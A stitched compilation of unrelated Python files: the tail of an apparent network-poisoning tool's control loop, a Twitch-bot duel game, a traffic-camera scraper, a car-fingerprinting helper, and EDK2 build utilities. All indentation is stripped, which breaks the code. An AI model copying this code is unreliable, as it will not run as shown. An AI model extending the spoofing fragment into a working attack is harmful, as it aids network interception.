cmd = command[self.CMD].lower()
if cmd in ['help', '?']:
print(self.__BOLD + 'exit: stop poisoning and exit' + self.__ENDC)
elif cmd in ['quit', 'exit', 'stop', 'leave']:
control_queue.put(('quit',))
poison_thread.join()
except KeyboardInterrupt:
# Ctrl+C detected, so let's finish the poison thread and exit
control_queue.put(('quit',))
poison_thread.join()
|
duel.py
|
import logging, coloredlogs
from threading import Thread
from random import randrange
from modules.config import *
from modules.database import Database
from modules.timer import Timer
database = Database(db_host, db_user, db_pass, db_name, db_autocommit)
database.database_connection()
class Duel:
CommandMain = 'duel'
CommandMainOptions = []
CommandResponses = ['accept', 'reject']
DuelCooldown = []
def __init__(self, user, opponent, amount):
self.user = user
self.cooldown_timer = Timer(self.user, DUEL_COOLDOWN, Duel.DuelCooldown, "DuelCooldown")
# opponent = opponent
# amount = int(amount)
self.opponent = opponent
self.amount = amount
def execute_command(self, command):
print("duel started!")
self.start_duel(self.opponent, self.amount)
def execute_command_response(self, response):
if response == Duel.CommandResponses[0]:
print("duel accepted!")
self.get_duel_win()
if response == Duel.CommandResponses[1]:
self.cancel_duel()
def start_duel(self, opponent, amount):
from modules.bot import bot_msg_whsp
if(self.user in Duel.DuelCooldown):
bot_msg_whsp("You can only start a duel every {} mins FailFish".format(int(DUEL_COOLDOWN/60)), self.user)
return ""
if(self.check(opponent, int(amount))):
bot_msg_whsp("{} challenged you to a duel of {} {}! Reply with !accept/!reject in the main chat or wait {} mins for the duel to expire HotPokket".format(self.user, amount, CURRENCY, int(DUEL_EXPIRE/60)), opponent)
bot_msg_whsp("You challenged {} to a duel of {} {}! If they don't respond within {} mins the duel will expire HotPokket".format(opponent, amount, CURRENCY, int(DUEL_EXPIRE/60)), self.user)
# Add duel to the database
database.db_add_duel(self.user, opponent, amount)
# Start cooldown timer thread
Thread(target=self.cooldown_timer.cooldown_run).start()
else:
return ""
def check(self, opponent, amount):
from modules.bot import bot_msg, bot_msg_whsp
if(opponent == NICK):
bot_msg("I always win {} MingLee".format(self.user))
return False
if(opponent == self.user):
return False
if(database.db_check_user_exists(self.user) == False or database.db_check_user_exists(opponent) == False):
return False
if(amount <= 0):
return False
user_points = database.db_get_user_points_int(self.user)
opponent_points = database.db_get_user_points_int(opponent)
if(amount > user_points):
bot_msg_whsp("{}, you don't have {} {} FailFish".format(self.user, amount, CURRENCY), self.user)
return False
if(amount > opponent_points):
bot_msg_whsp("{} doesn't have enough {} to accept this duel. Try a lower amount BabyRage".format(opponent, CURRENCY), self.user)
return False
if(self.check_status(opponent, amount)):
return True
else:
return False
def check_status(self, opponent, amount):
from modules.bot import bot_msg_whsp
if(database.db_check_duel_exists_user(self.user)):
bot_msg_whsp("You are already in an active duel with {}.".format(database.db_get_duel_opponent_from_user(self.user)), self.user)
return False
if(database.db_check_duel_exists_opponent(opponent)):
bot_msg_whsp("{} is already in an active duel.".format(opponent), self.user)
return False
if(database.db_check_duel_exists_opponent(self.user)):
bot_msg_whsp("You must wait for your current duel with {} to finish before doing another.".format(database.db_get_duel_user_from_opponent(self.user)), self.user)
return False
return True
def get_duel_win(self):
from modules.bot import bot_msg, bot_msg_whsp
if(database.db_check_duel_exists_opponent(self.user)):
get_opponent = database.db_get_duel_user_from_opponent(self.user)
win = randrange(0, 2)
points_win = database.db_get_duel_amount(self.user)
if(win == 0):
print('win')
bot_msg("{} won the duel against {} and gets {} {}! FeelsGoodMan KAPOW".format(self.user, get_opponent, points_win, CURRENCY))
database.db_minus_points_user(get_opponent, points_win)
database.db_add_points_user(self.user, points_win)
else:
print('win here')
bot_msg("{} won the duel against {} and gets {} {}! FeelsGoodMan KAPOW".format(get_opponent, self.user, points_win, CURRENCY))
database.db_minus_points_user(self.user, points_win)
database.db_add_points_user(get_opponent, points_win)
database.db_remove_duel(self.user)
def cancel_duel(self):
from modules.bot import bot_msg, bot_msg_whsp
if(database.db_check_duel_exists_opponent(self.user)):
get_opponent = database.db_get_duel_user_from_opponent(self.user)
points_win = database.db_get_duel_amount(self.user)
bot_msg("{} rejected the {} {} duel against {} BabyRage".format(self.user, points_win, CURRENCY, get_opponent))
database.db_remove_duel(self.user)
|
generate-data.py
|
import os
import urllib2
import email.utils as eut
import json
import cv2
import process_bgs
from threading import Thread, Lock
from time import sleep
relevantCams = [
#"KA091",
#"KA061",
#"KA041",
#"KA151"
"K11"
]
showPreview = False
printMutex = Lock()
def printLocked(text):
printMutex.acquire()
try:
print(text)
finally:
printMutex.release()
def getImageUrl(camera):
return "http://www.svz-bw.de/kamera/ftpdata/" + camera + "/" + camera + "_gross.jpg"
def downloadImage(camera):
url = getImageUrl(camera)
image = {}
image["url"] = url
image["valid"] = False
try:
request = urllib2.Request(url, headers={"Referer" : "https://www.svz-bw.de"})
response = urllib2.urlopen(request)
image["data"] = response.read()
image["time_raw"] = response.info().getheader('Last-Modified')
t = eut.parsedate(image["time_raw"])
image["time"] = t
image["time_str"] = str(t[0]) + "-" + str(t[1]) + "-" + str(t[2]) + "-" + str(t[3]) + "-" + str(t[4]) + "-" + str(t[5])
image["valid"] = True
printLocked("Downloaded image for " + camera)
except:
printLocked("Failed to download image for " + camera)
image["valid"] = False
return image
def createFolder(folder):
if not os.path.exists(folder):
os.makedirs(folder)
def saveImage(container, image):
createFolder("data/" + container["camera"])
f = open("data/" + container["camera"] + "/" + image["time_str"] + ".jpg", "wb")
f.write(image["data"])
f.close()
def processImage(container, image):
saveImage(container, image)
result = container["processor"].processRaw(image["data"], showPreview)
data = {}
data["left"] = result[0]
data["right"] = result[1]
data["time"] = image["time_raw"]
data["verified"] = False
info = json.dumps(data, indent=4)
f = open("data/" + container["camera"] + "/" + image["time_str"] + ".json", "w")
f.write(info)
f.close()
printMutex.acquire()
try:
print("Image parsed for " + container["camera"])
print("\tL: Jam = " + str(result[0]["jam"]) + " Vehicles = " + str(result[0]["vehicles"]))
print("\tR: Jam = " + str(result[1]["jam"]) + " Vehicles = " + str(result[1]["vehicles"]))
finally:
printMutex.release()
def handleCamera(camera):
container = {}
container["camera"] = camera
container["last"] = None
container["valid"] = None
container["processor"] = process_bgs.ImageProcessor(camera)
while(True):
printLocked("Downloading image for " + camera)
image = downloadImage(camera)
if image["valid"] == True:
if(container["valid"] is None or container["valid"]["time_str"] != image["time_str"]):
processImage(container, image) # Only process if it's a new image
container["valid"] = image
container["last"] = image
#sleep(60)
cv2.waitKey(60 * 1000)
def main():
threads = []
for cam in relevantCams:
thread = Thread(target = handleCamera, args = (cam, ))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
main()
|
car_helpers.py
|
import os
import threading
import requests
from common.params import Params, put_nonblocking
from common.basedir import BASEDIR
#from selfdrive.version import is_comma_remote, is_tested_branch
from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_legacy_fingerprint_cars
from selfdrive.car.vin import get_vin, VIN_UNKNOWN
from selfdrive.car.fw_versions import get_fw_versions, match_fw_to_car
from selfdrive.swaglog import cloudlog
import cereal.messaging as messaging
from selfdrive.car import gen_empty_fingerprint
import selfdrive.sentry as sentry
from cereal import car
EventName = car.CarEvent.EventName
def get_startup_event(car_recognized, controller_available, fw_seen):
if True: #is_comma_remote() and is_tested_branch():
event = EventName.startup
else:
event = EventName.startupMaster
if not car_recognized:
if fw_seen:
event = EventName.startupNoCar
else:
event = EventName.startupNoFw
elif car_recognized and not controller_available:
event = EventName.startupNoControl
return event
def get_one_can(logcan):
while True:
can = messaging.recv_one_retry(logcan)
if len(can.can) > 0:
return can
def load_interfaces(brand_names):
ret = {}
for brand_name in brand_names:
path = f'selfdrive.car.{brand_name}'
CarInterface = __import__(path + '.interface', fromlist=['CarInterface']).CarInterface
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carstate.py'):
CarState = __import__(path + '.carstate', fromlist=['CarState']).CarState
else:
CarState = None
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carcontroller.py'):
CarController = __import__(path + '.carcontroller', fromlist=['CarController']).CarController
else:
CarController = None
for model_name in brand_names[brand_name]:
ret[model_name] = (CarInterface, CarController, CarState)
return ret
def _get_interface_names():
# read all the folders in selfdrive/car and return a dict where:
# - keys are all the car names that which we have an interface for
# - values are lists of spefic car models for a given car
brand_names = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
try:
brand_name = car_folder.split('/')[-1]
model_names = __import__(f'selfdrive.car.{brand_name}.values', fromlist=['CAR']).CAR
model_names = [getattr(model_names, c) for c in model_names.__dict__.keys() if not c.startswith("__")]
brand_names[brand_name] = model_names
except (ImportError, OSError):
pass
return brand_names
# imports from directory selfdrive/car/<name>/
interface_names = _get_interface_names()
interfaces = load_interfaces(interface_names)
# **** for use live only ****
def fingerprint(logcan, sendcan):
fixed_fingerprint = os.environ.get('FINGERPRINT', "")
skip_fw_query = os.environ.get('SKIP_FW_QUERY', False)
dp_car_assigned = Params().get('dp_car_assigned', encoding='utf8')
if dp_car_assigned is not None:
car_selected = dp_car_assigned.strip()
fixed_fingerprint = car_selected
skip_fw_query = True
if not fixed_fingerprint and not skip_fw_query:
# Vin query only reliably works thorugh OBDII
bus = 1
cached_params = Params().get("CarParamsCache")
if cached_params is not None:
cached_params = car.CarParams.from_bytes(cached_params)
if cached_params.carName == "mock":
cached_params = None
if cached_params is not None and len(cached_params.carFw) > 0 and cached_params.carVin is not VIN_UNKNOWN:
cloudlog.warning("Using cached CarParams")
vin = cached_params.carVin
car_fw = list(cached_params.carFw)
else:
cloudlog.warning("Getting VIN & FW versions")
_, vin = get_vin(logcan, sendcan, bus)
car_fw = get_fw_versions(logcan, sendcan, bus)
exact_fw_match, fw_candidates = match_fw_to_car(car_fw)
else:
vin = VIN_UNKNOWN
exact_fw_match, fw_candidates, car_fw = True, set(), []
cloudlog.warning("VIN %s", vin)
Params().put("CarVin", vin)
finger = gen_empty_fingerprint()
candidate_cars = {i: all_legacy_fingerprint_cars() for i in [0, 1]} # attempt fingerprint on both bus 0 and 1
frame = 0
frame_fingerprint = 10 # 0.1s
car_fingerprint = None
done = False
while not done:
a = get_one_can(logcan)
for can in a.can:
# The fingerprint dict is generated for all buses, this way the car interface
# can use it to detect a (valid) multipanda setup and initialize accordingly
if can.src < 128:
if can.src not in finger:
finger[can.src] = {}
finger[can.src][can.address] = len(can.dat)
for b in candidate_cars:
# Ignore extended messages and VIN query response.
if can.src == b and can.address < 0x800 and can.address not in (0x7df, 0x7e0, 0x7e8):
candidate_cars[b] = eliminate_incompatible_cars(can, candidate_cars[b])
# if we only have one car choice and the time since we got our first
# message has elapsed, exit
for b in candidate_cars:
if len(candidate_cars[b]) == 1 and frame > frame_fingerprint:
# fingerprint done
car_fingerprint = candidate_cars[b][0]
# bail if no cars left or we've been waiting for more than 2s
failed = (all(len(cc) == 0 for cc in candidate_cars.values()) and frame > frame_fingerprint) or frame > 200
succeeded = car_fingerprint is not None
done = failed or succeeded
frame += 1
exact_match = True
source = car.CarParams.FingerprintSource.can
# If FW query returns exactly 1 candidate, use it
if len(fw_candidates) == 1:
car_fingerprint = list(fw_candidates)[0]
source = car.CarParams.FingerprintSource.fw
exact_match = exact_fw_match
if fixed_fingerprint:
car_fingerprint = fixed_fingerprint
source = car.CarParams.FingerprintSource.fixed
cloudlog.event("fingerprinted", car_fingerprint=car_fingerprint,
source=source, fuzzy=not exact_match, fw_count=len(car_fw))
return car_fingerprint, finger, vin, car_fw, source, exact_match
def is_connected_to_internet(timeout=5):
try:
requests.get("https://sentry.io", timeout=timeout)
return True
except Exception:
return False
def crash_log(candidate):
while True:
if is_connected_to_internet():
sentry.capture_warning("fingerprinted %s" % candidate)
break
def crash_log2(fingerprints, fw):
while True:
if is_connected_to_internet():
sentry.capture_warning("car doesn't match any fingerprints: %s" % fingerprints)
sentry.capture_warning("car doesn't match any fw: %s" % fw)
break
def get_car(logcan, sendcan):
candidate, fingerprints, vin, car_fw, source, exact_match = fingerprint(logcan, sendcan)
if candidate is None:
cloudlog.warning("car doesn't match any fingerprints: %r", fingerprints)
candidate = "mock"
y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,))
y.start()
x = threading.Thread(target=crash_log, args=(candidate,))
x.start()
try:
CarInterface, CarController, CarState = interfaces[candidate]
car_params = CarInterface.get_params(candidate, fingerprints, car_fw)
car_params.carVin = vin
car_params.carFw = car_fw
car_params.fingerprintSource = source
car_params.fuzzyFingerprint = not exact_match
# dp - handle sr learner memory/reset feature
params = Params()
candidate_changed = params.get('dp_last_candidate', encoding='utf8') != candidate
# keep stock sr
put_nonblocking("dp_sr_stock", str(car_params.steerRatio))
dp_sr_custom = params.get("dp_sr_custom", encoding='utf8')
# reset default sr
if dp_sr_custom == '' or candidate_changed or (dp_sr_custom != '' and float(dp_sr_custom) <= 9.99):
put_nonblocking("dp_sr_custom", str(car_params.steerRatio))
# update last candidate
put_nonblocking('dp_last_candidate', candidate)
return CarInterface(car_params, CarController, CarState), car_params
except KeyError:
put_nonblocking("dp_last_candidate", '')
put_nonblocking("dp_car_assigned", '')
put_nonblocking("dp_sr_custom", '9.99')
put_nonblocking("dp_sr_stock", '9.99')
return None, None
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
from random import sample
from struct import pack
import uuid
import subprocess
from collections import OrderedDict
import Common.LongFilePathOs as os
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from Common.DataType import *
from Common.BuildToolError import *
from CommonDataClass.DataClass import *
from Common.Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# status machine transection
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
# fond a binary pcd entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if os.path.exists(File):
if IsBinaryFile:
try:
with open(File, "rb") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
else:
try:
with open(File, "r") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
if IsBinaryFile:
try:
with open(File, "wb") as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
else:
try:
with open(File, 'w') as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
return True
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = list(P.Guids.keys())
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
